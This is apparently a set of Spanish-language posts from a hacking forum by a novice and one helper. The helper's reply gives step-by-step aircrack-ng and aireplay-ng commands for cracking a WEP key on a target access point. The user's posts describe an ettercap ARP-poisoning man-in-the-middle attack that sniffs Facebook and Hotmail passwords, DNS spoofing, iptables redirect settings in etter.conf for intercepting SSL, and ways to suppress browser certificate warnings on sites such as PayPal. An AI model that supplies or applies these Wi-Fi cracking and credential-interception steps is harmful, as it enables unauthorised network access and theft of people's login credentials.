Mensajes

Problema solucionado... que susto.
Si a alguien le pasa, ejecutan cmd desde windows y luego ejecutan el comando:

ipconfig /flushdns

Y todo solucionado.

Hola, pues nada que soy un manazas, y trasteando el archivo etter.dns, y haciendo pruebas con mi ordenador he hecho que windows cada vez que quiera entrar en google, me redireccione a mi puerta de enlace : 192.168.0.1.

¿Hay alguna manera de revertir esto? Sin google no valgo nada  jajaja

La pregunta es ¿Que estas haciendo bien? jaja.
Lo primero que tienes que hacer es capturar con airodump, que veo que ese paso si que lo cumples. Pero te saltas el paso mas importante, la asociacion. Con leer un poquito te hubieras dado cuenta pero bueno, te dejo los pasos.

1º Capturar

airodump-ng -c (canal) --bssid (mac victima) -w (nombre archivo) eth1

2º Asociar

aireplay-ng -1 30 -e (nombre AP) -a (mac victima) -h (tu mac) eth1

3º Atacar

aireplay-ng -3 -b (mac ap) -h (tu mac) eth1

como este ataque no siempre funciona, se recomienda alternar con:

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (mac ap) -h (tu mac) eth1

4º Descifrar Clave

aircrack-ng -z *.cap
o
aircrack-ng *.cap


El ataque 0 que haces sirve para desconectar al cliente del ap, que se suele usar ese ataque para conseguir el handshake en WPA, tu supongo que estas intentando sacar una clave WEP y para este proposito el ataque 0 de poco te sirve.
Contesto porque hasta hace poco yo tampoco tenia ni idea y me daba rabia no encontrar nada al respecto, pero hay que buscar bien que todo esta por muchisimos sitios y muy bien explicado.
Un saludo.

[Esta conexión no está verificada Ha pedido a Firefox que se conecte de forma segura a www.google.com, pero no se puede confirmar que la conexión sea segura. Normalmente, cuando se intente conectar de forma segura, los sitios presentan información verificada para asegurar que está en el sitio correcto. Sin embargo, la identidad de este sitio no puede ser verificada. ¿Qué debería hacer? Si normalmente accede a este sitio sin problemas, este error puede estar ocurriendo porque alguien está intentando suplantar al sitio, y no debería continuar. Detalles técnicos www.google.com usa un certificado de seguridad no válido.No se confía en el certificado porque el certificado emisor es desconocido.(Código de error: sec_error_unknown_issuer) Entiendo los riesgos Si sabe lo que está haciendo, puede obligar a Firefox a confiar en la identificación de este sitio.Incluso aunque confíe en este sitio, este error puede significar que alguien esté interfiriendo en su conexión. No añada una excepción a menos que sepa que hay una razón seria por la que este sitio no use identificación confiable.]

DIOSSSS lo he solucionado, solo tenia que descomentar el redir_command_on de las iptables y dejar comentado el redir_command_of, asi que lo dicho eres el amo porque me has hecho darme cuenta donde estaba el fallo jejeje. Muchisimas gracias.


Vuelvo a editar(soy pesado lo se y lo siento) jaja:

Con lo que he hecho, no me sale el error anterior, pero si que me sigue pidiendo certificado de autentificacion en las paginas que anteriormente no he añadido excepcion. Me explico, en facebook y hotmail, como ya la añadi ayer no me ha pedido nada, pero al entrar en paypal, otra vez me salto la alarma del firefox. En internet explorer ni me deja abrir la pagina ¿Hay alguna forma de evitar esto? ¿Si hay que modificar el etter.conf o algun otro archivo me podrias decir de que manera?



Este es el dichoso error que me manda siempre firefox:


Esta conexión no está verificada

     

     
     
     

       

         

Ha pedido a Firefox que se conecte de forma segura a www.google.com, pero no se puede confirmar que la conexión sea segura.

         

Normalmente, cuando se intente conectar de forma segura, los sitios presentan información verificada para asegurar que está en el sitio correcto. Sin embargo, la identidad de este sitio no puede ser verificada.

       

       
       

         
¿Qué debería hacer?

         

           

Si normalmente accede a este sitio sin problemas, este error puede estar ocurriendo porque alguien está intentando suplantar al sitio, y no debería continuar.

           
         

       

       
       
       

         
Detalles técnicos

         

www.google.com usa un certificado de seguridad no válido.

No se confía en el certificado porque el certificado emisor es desconocido.

(Código de error: sec_error_unknown_issuer)

       

       
       

         
Entiendo los riesgos

         

           

Si sabe lo que está haciendo, puede obligar a Firefox a confiar en la identificación de este sitio.
Incluso aunque confíe en este sitio, este error puede significar que alguien esté interfiriendo en su conexión.

           

No añada una excepción a menos que sepa que hay una razón seria por la que este sitio no use identificación confiable.

           

[# if you use ipchains: #redir_command_on = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"# if you use iptables: redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"]

Ostia gracias tio, borre la linea de iptables en un principio, pero como me seguia sin funcionar la volvi a poner. Vamos que al final se quedo la linea de iptables puesta. Voy a borrarla y como funcione eres el amo jaja.

Edito:
Nada, ni p**a idea. He probado dejando las lineas asi:

# if you use ipchains:
 #redir_command_on = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
    #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
  redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Que es como lo hice en un principio, y es donde me salia la advertencia, luego probe quitando la linea de redir_command_on de iptables, y no me snifaba nada, y luego quitando la linea de redir_command_on de ipchains (confundi descomentar con borrar linea)y cuando entro en hotmail o facebook, me dice problema al cargar la pagina.

¿Me podrias decir como tengo que dejar el archivo?

Si lo que quieres es que Vmware te reconozca un dispositivo usb, tienes que abrir la maquina virtual, en este caso backtrack, y en el menu de Vmware, le tienes que dar a la pestaña de Virtual Machine>>Removable devices>> (y aqui deberia salir tu dispositivo usb) le das a connect y ya deberia correr en vmware.
Creo que es a esto a lo que te refieres.

Muchas gracias ya le he echado un ojo. Hay muchos terminos y programas de los manuales que no conozco, pero todo sera tema de investigar jeje. Un saludo.

[Conexión segura fallida Ha ocurrido un error durante una conexión a www.facebook.com.Ha recibido un certificado no válido. Por favor, contacte con el administrador o dirección de correo electrónico de contacto del servidor y facilíteles la siguiente información:Su certificado contiene el mismo número de serie que otro certificado emitido por la autoridad de certificación. Por favor, obtenga un nuevo certificado que contenga un número de serie único.(Código de error: sec_error_reused_issuer_and_serial) * La página que está intentando ver no puede mostrarse porque no se ha podido verificar la autenticidad de los datos recibidos. * Por favor, contacte con los administradores del sitio web para informarles de este problema. De manera alternativa, use la opción del menú Ayuda para informar del problema de este sitio web.]

Hola, soy un poco novato en esto y espero que no me crucifiqueis por ello  . Despues de muchos intentos de instalar ettercap en ubuntu, y de leer muchos manuales de instalacion, consegui que funcionara en su totalidad y sin errores, en una maquina virtual vmware como atacante, y en windows 7 como victima las dos maquinas asociadas al mismo AP claro. Bueno pues escanee hosts, vi la mac del routerl y mi mac de windows. Luego lanze arp-poisioning, y le puse el comando remote. Y para terminar le di a start sniffing. De momento todo bien, asi que me puse en windows a entrar en los sitios donde tengo contraseñas (facebook, tuenti, hotmail...).
El primer inconveniente que tuve, fue que me dijo que el cifrado de la pagina web no era seguro, y me decia mi navegador(firefox), que si queria salir de alli, o en cambio confiaba en la pagina web. Le dije que confiaba en la pagina web, entro y al ir al ettercap alli estaban mi usuario y mi contraseña, y yo mas contento que unas pascuas por haberlo conseguido.
Pero mi alegria duro poco jaja, al ver lo facil que habia sido, decidi reiniciar ubuntu y volver a hacerlo todo desde el principio, para aprender los pasos y estudiarlo todo bien bien, y bueno tras realizar los mismos pasos, y luego irme a windows, al firefox y entrar a cualquir pagina de las que me piden contraseña, el navegador me lanzaba el siguiente error:



Conexión segura fallida

     

     
     
     

     
       
       

         

Ha ocurrido un error durante una conexión a www.facebook.com.

Ha recibido un certificado no válido. Por favor, contacte con el administrador o dirección de correo electrónico de contacto del servidor y facilíteles la siguiente información:

Su certificado contiene el mismo número de serie que otro certificado emitido por la autoridad de certificación. Por favor, obtenga un nuevo certificado que contenga un número de serie único.

(Código de error: sec_error_reused_issuer_and_serial)

       


       
       


    *   La página que está intentando ver no puede mostrarse porque no se ha podido verificar la autenticidad de los datos recibidos.

    *   Por favor, contacte con los administradores del sitio web para informarles de este problema. De manera alternativa, use la opción del menú Ayuda para informar del problema de este sitio web.

Y ahora me surgen varias dudas;

-¿Es normal que pase esto cuando haces un ataque mim?
-¿O esto ocurre porque posiblemente instale algo mal en el ettercap, librerias, openssl etc...?

Perdonar mis dudas de novato, he hecho todo lo posible por no preguntar y averiguar por mi solo pero no encuentro nada de nada. Gracias de antemano y un saludo.

No me deja abrir la pagina de  los exploits ¿alguien me puede dar otro link?

Buenas! Pues esta es mi duda: Tengo dos ordenadores portatiles, el mio y el de mi hermana y me gustaria poner a prueba su seguridad. ¿Hay algun manual que explique como acceder de un ordenador al otro? Tengo archivos compartidos, con su usuario y contraseña, pero me gustaria saber como de seguro es esto y si es posible saltarse el usuario y la contraseña.
He buscado por el foro y no he visto nada al respecto, asi que si sabeis de algun link donde se explique todo estare muy agradecido. Gracias y un saludo.